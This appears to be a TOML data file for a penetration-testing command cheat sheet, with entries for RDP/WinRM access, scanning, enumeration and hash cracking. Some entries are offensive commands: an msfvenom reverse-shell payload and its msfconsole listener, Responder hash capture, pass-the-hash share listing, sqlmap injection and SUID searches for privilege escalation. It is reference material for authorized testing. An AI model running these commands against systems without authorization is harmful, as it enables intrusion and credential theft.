title = "Pentest commands"

# Basic configurations
max_events = 100
destination = "127.0.0.1"


# ============================ #
#                              #
#         ALL COMMANDS         #
#                              #
# ============================ #

# ===== NETWORK COMMANDS ===== #
# ============================ #

[command.evilwinrm0]
name_exe = "evil-winrm"
cmd_types = "network"
args = "-i <ip|127.0.0.1> -u <username> -p <password>"
explanation = """
Connect to an Windows machine. Few problem may occur with this tool, then do: `export OPENSSL_CONF=/home/user/evilwinrm.conf` 

This file (.conf) must contains this:
```
openssl_conf = openssl_init
[openssl_init]
providers = provider_sect
[provider_sect]
default = default_sect
legacy = legacy_sect
[default_sect]
activate = 1
[legacy_sect]
activate = 1
```"""
examples = [
    "evil-winrm -i 127.0.0.1 -u 'domain/username' -p 'password'"
]

[command.remmina0]
name_exe = "remmina"
cmd_types = "network"
args = "-c rdp://<user:password>@<ip|127.0.0.1>"
explanation = """
Connect with GUI to an Windows machine with RDP protocol.
"""
examples = [
    "remmina -c rdp://user:password@127.0.0.1"
]

[command.xfreerdp0]
name_exe = "xfreerdp"
cmd_types = "network"
args = "/cert:ignore /u:<user> /p:<password> /v:<ip|127.0.0.1>"
explanation = """
Connect with GUI to an Windows machine with RDP protocol.
"""
examples = [
    "xfreerdp /u:user /p:password /v:127.0.0.1"
]

[command.xfreerdp1]
name_exe = "xfreerdp"
cmd_types = "network"
args = "/cert:<status|ignore> /d:<domain|corp.local> /u:<user> /p:<password> /v:<ip|127.0.0.1>"
explanation = """
Connect with GUI to an Windows machine with RDP protocol.
"""
examples = [
    "xfreerdp /u:user /p:password /v:127.0.0.1"
]

[command.pwsh0]
name_exe = "pwsh-preview"
cmd_types = "misc"
args = "-c '[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes(\"<command>\"))'"
explaination = """
Convert command to Base64String with PowerShell.
"""
examples = [
    "pwsh-preview -c 'Convert::ToBase64String([System.Text.Encoding]::Unicode.GetBytes(\"ping 127.0.0.1\"))'"
]

[command.ssh0]
name_exe = "ssh"
cmd_types = "network"
args = "-o 'UserKnownHostsFile=/dev/null' -o 'StrictHostKeyChecking=no' -o 'Loglevel=QUIET' <conn|user@127.0.0.1>"
explaination = """
Connect with SSH without saving nor checking known host.
"""
examples = [
    "ssh -o 'UserKnownHostsFile=/dev/null' -o 'StrictHostKeyChecking=no' -o 'Loglevel=QUIET' user@127.0.0.1"
]


# ===== SYSADMIN COMMANDS =====
# ============================ #

[command.shell0]
name_exe = "python3"
cmd_types = "sysadmin"
explanation = "Upgrade shell for more flexibility"
args = "-c 'import pty; pty.spawn(\"/bin/bash\")'"
examples = [
    "python3 -c 'import os; os.system(\"/bin/bash -p\")'",
    "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'"
]

[command.capabilities0]
name_exe = "getcap"
cmd_types = "sysadmin"
explanation = "Search binaries with capabilities (often require sudo)"
args = "-r / 2>/dev/null"
examples = [
    "sudo getcap -r / 2>/dev/null",
    "sudo getcap /usr/bin/ping"
]

[command.ip0]
name_exe = "ip"
cmd_types = "sysadmin"
explanation = "Put up/down an interface"
args = "link set dev <interface> <status|down>"
examples = [
    "link set dev eth0 down",
    "link set dev eth0 up"
]

[command.ufw0]
name_exe = "ufw"
cmd_types = "sysadmin"
explanation = "Allow ip to contacted our machine"
args = "allow from <target>"
examples = [
    "ufw allow from 192.168.0.101"
]

[command.icacls0]
name_exe = "icacls"
cmd_types = "sysadmin"
explanation = "Check file/folder permission for users"
args = "<path>"

[command.mysql0]
name_exe = "mysql"
cmd_types = "sysadmin"
explanation = "Connect to a mysql database"
args = "-u <username|root> -p<password> -P <port|3306> --host <ip|127.0.0.1> <dbname>"
examples = [
    "mysql -u root -p user -P pass --host 127.0.0.1 bddname"
]


# ===== PENTEST COMMANDS =====
# ============================ #

[command.nmap0]
name_exe = "nmap"
cmd_types = "pentest|network"
explanation = "Scanning all ports with SYN scan and saving in file"
args = "-n -sV -sS -Pn -p- -oN <output_file|scan.txt> <destination|127.0.0.1>"
examples = [
    "nmap -sV -sS -Pn -p- -oN scan.nmap 127.0.0.1"
]

[command.nmap1]
name_exe = "nmap"
cmd_types = "pentest|network"
explanation = "Version -sV, default script -sC"
args = "-n -sC -sV <ip|127.0.0.1>"
examples = [
    "nmap -sC -sV 127.0.0.1",
    "nmap -sV -p 443 --script 'vuln'"
]

[command.nmap2]
name_exe = "nmap"
cmd_types = "pentest|network"
explanation = "SMB OS discovery"
args = "-n -p139,445 --script smb-os-discovery <ip|127.0.0.1>"
examples = [
    "nmap -n -p139,445 --script smb-os-discovery  127.0.0.1"
]

[command.dnsenum0]
name_exe = "dnsenum"
cmd_types = "pentest|network"
explanation = "DNS Enumeration"
args = "<hostname>"
examples = [
    "dnsenum example.com"
]

[command.enum4linux0]
name_exe = "enum4linux"
cmd_types = "pentest|network"
explanation = "SMB Enumeration"
args = "<hostname>"
examples = [
    "enum4linux example.com"
]

[command.onesixtyone0]
name_exe = "onesixtyone"
cmd_types = "pentest|network"
explanation = "SNMP Bruteforce Attack"
args = "-c <communities_file> -i <ips_file>"
examples = [
    "onesixtyone -c communities.txt -i ips.txt"
]

[command.snmpwalk0]
name_exe = "snmpwalk"
cmd_types = "pentest|network"
explanation = "SNMP Enumeration"
args = "-c <community|public> -v1 -t 10 <ip|127.0.0.1> -Oa"
examples = [
    "snmpwalk -c public -v1 -t 10 127.0.0.1 -Oa # Enumerate entire MIB Tree (-Oa: used to decode hexadecimal)",
    "snmpwalk -c public -v1 127.0.0.1 1.3.6.1.4.1.77.1.2.25  # Enumerate all users on the Windows machine",
    "snmpwalk -c public -v1 192.168.50.151 1.3.6.1.2.1.25.4.2.1.2  # List all machine running processes",
    "snmpwalk -c public -v1 192.168.50.151 1.3.6.1.2.1.25.6.3.1.2  # List all machine installed softwares",
    "snmpwalk -c public -v1 192.168.50.151 1.3.6.1.2.1.6.13.1.3  # List all machine TCP listening ports"
]

[command.host0]
name_exe = "host"
cmd_types = "pentest|network"
explanation = "DNS Enumeration with type handling"
args = "-t <type|any> <hostname>"
examples = [
    "dnsenum -t mx example.com"
]

[command.ffuf0]
name_exe = "ffuf"
cmd_types = "pentest"
explanation = """Bruteforce directory, FUZZ keyword is mandatory and a `/` at the end also otherwise it's not gonna work.
There is also a filter response size to avoid false positives.
"""
args = "-w <list_path|file.txt> -u http://<url|localhost>/FUZZ/ -t 100 -fs <response-size|1000>"
examples = [
    "ffuf -u http://localhost/FUZZ/ -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt -fs 1000"
]

[command.ffuf1]
name_exe = "ffuf"
cmd_types = "pentest"
explanation = "Bruteforce subdomain"
args = "-w <list_path|file.txt:FHOST> -u <url|http://localhost/> -H <header|'Host:FHOST.localhost'> -t 100"
examples = [
    "ffuf -w '/opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FHOST' -u 'http://localhost/' -H 'Host:FHOST.localhost' -t 100"
]

[command.sqlmap0]
name_exe = "sqlmap"
cmd_types = "pentest"
explanation = "SQL injection of username/password"
args = "-u <url|'http://127.0.0.1/login'> --data <data|'username=admin&password=password'>"
examples = [
    "sqlmap -u 'http://searcher.htb/search' --data 'username=admin&password=password'"
]

[command.dirb0]
name_exe = "dirb"
cmd_types = "pentest"
explanation = "Bruteforce url paths"
args = "<url|http://127.0.0.1/> <list>"
examples = [
    "dirb http://10.10.11.242/ /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt"
]

[command.gobuster0]
name_exe = "gobuster"
cmd_types = "pentest"
explanation = "Bruteforce url paths with blacklist status code"
args = "dir -u <ip|127.0.0.1> -w <list.txt|/opt/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt> -t 5 --status-codes-blacklist <code|404>"
examples = [
    "gobuster dir -u 127.0.0.1 -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt -t 5 --status-codes-blacklist 404,301"
]

[command.find0]
name_exe = "find"
cmd_types = "pentest|sysadmin"
explanation = "Find binaries with SUID bit set"
args = "/ -perm -4000 2> /dev/null"
examples = [
    "find / -perm -4000 2> /dev/null"
]

[command.msfvenom0]
name_exe = "msfvenom"
cmd_types = "pentest"
explanation = "Create reverse shell tcp"
args = "-p <payload|windows/shell_reverse_tcp> LHOST=<ip|127.0.0.1> LPORT=<port|4444> -f <type|exe> > reverse_tcp.exe"
examples = [
    "msfvenom -p payload|windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f exe > reverse_tcp.exe"
]

[command.msfconsole0]
name_exe = "msfconsole"
cmd_types = "pentest"
explanation = "Handler reverse shell tcp"
args = "-q -x 'use exploit/multi/handler;set payload <PAYLOAD|windows/meterpreter/reverse_tcp> ;set LHOST <LHOST|127.0.0.1> ;set LPORT <LPORT|4444> ;run;'"
examples = [
    "msfconsole -q -x 'use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST 127.0.0.1;set LPORT 4444;run;'"
]

[command.hashcat0]
name_exe = "hashcat"
cmd_types = "pentest"
explanation = """
Crack password of a chosen <type>.
This can be combined with hashid to find type of hash:
$ hashid <hash>"""
args = "-m <type> <hashfile|hash.txt> <wordlist|/usr/share/wordlists/rockyou.txt>"
examples = [
    "hashcat -m 3200 hash.txt /usr/share/wordlists/rockyou.txt"
]

[command.pspy64s0]
name_exe = "pspy64s"
cmd_types = "pentest"
explanation = """
Pspy is a command line tool designed to snoop on processes without need for root permissions.
It allows you to see commands run by other users, cron jobs, etc. as they execute."""
args = "-i <milli|100>"
examples = [
    "pspy64s -i 100"
]

[command.nmap3]
name_exe = "cat"
cmd_types = "pentest"
explanation = """
Search in the nmap NSE scripts for vuln (can search the impact of the script - safe/intrusive).
There is also an example of reloading the script.db file if a new '.nse' file was added."""
args = "/usr/share/nmap/scripts/script.db | grep '<search|safe>'"
examples = [
    "cat /usr/share/nmap/scripts/script.db | grep 'vuln'",
    "nmap --script-updatedb"
]

[command.ldapdomaindump0]
name_exe = "ldapdomaindump"
cmd_types = "pentest"
explanation = "Dump LDAP information"
args = "-u '<DOMAIN/user|CORP.local/user>' -p '<LM:NTLM>' -at NTLM ldap://<ip|127.0.0.1>"
examples = [
    "ldapdomaindump -u 'CORP.local/user' -p 'ba0ecf3dcda348e7a91e548719c3ac6e:12943dbced43cd06a0445dd11fac3a7d' -at NTLM ldap://127.0.0.1"
]

[command.crackmapexec0]
name_exe = "crackmapexec"
cmd_types = "pentest"
explanation = "List shares on list of machines"
args = "smb <ipsfile|ips.txt> -u <username> -H <NTHASH> --shares"
examples = [
    "crackmapexec smb ips.txt -u user -H <NTHASH> --shares"
]

[command.smbclient0]
name_exe = "smbclient.py"
cmd_types = "pentest"
explanation = "Setup an smb share"
args = "<share|c> <path|./>"
examples = [
    "smbclient.py c ./"
]

[command.http_server0]
name_exe = "python3 -m http.server"
cmd_types = "pentest"
explanation = "Setup an HTTP server"
args = "--bind <ip|127.0.0.1> <port|8000>"
examples = [
    "python3 -m http.server --bind 127.0.0.1 8000"
]

[command.Responder0]
name_exe = "sudo python3 Responder.py"
cmd_types = "pentest"
explanation = "Gather NTHASH on network"
args = "-I <local-interface> -i <ip|127.0.0.1>"
examples = [
    "sudo python3 Responder.py -I enp0s3 -i 192.168.3.85"
]

[command.mssqlclient0]
name_exe = "python3 mssqlclient.py"
cmd_types = "pentest"
explanation = "Connect to a MSSQL database instance"
args = "<username:password@ip|sa:pass@127.0.0.1> -db <dbname>"
examples = [
    "mssqlclient.py sa:password@127.0.0.1 -db database"
]


# ===== REVERSE COMMANDS =====
# ============================ #

[command.objdump0]
name_exe = "objdump"
cmd_types = "reverse"
explanation = "Display information from the binary in <type> format"
args = "-D <binary> -M <type|intel>"
examples = [
    "obdjump -M intel -D bin",
    "objdump -dj .rodata loop -M intel"
]
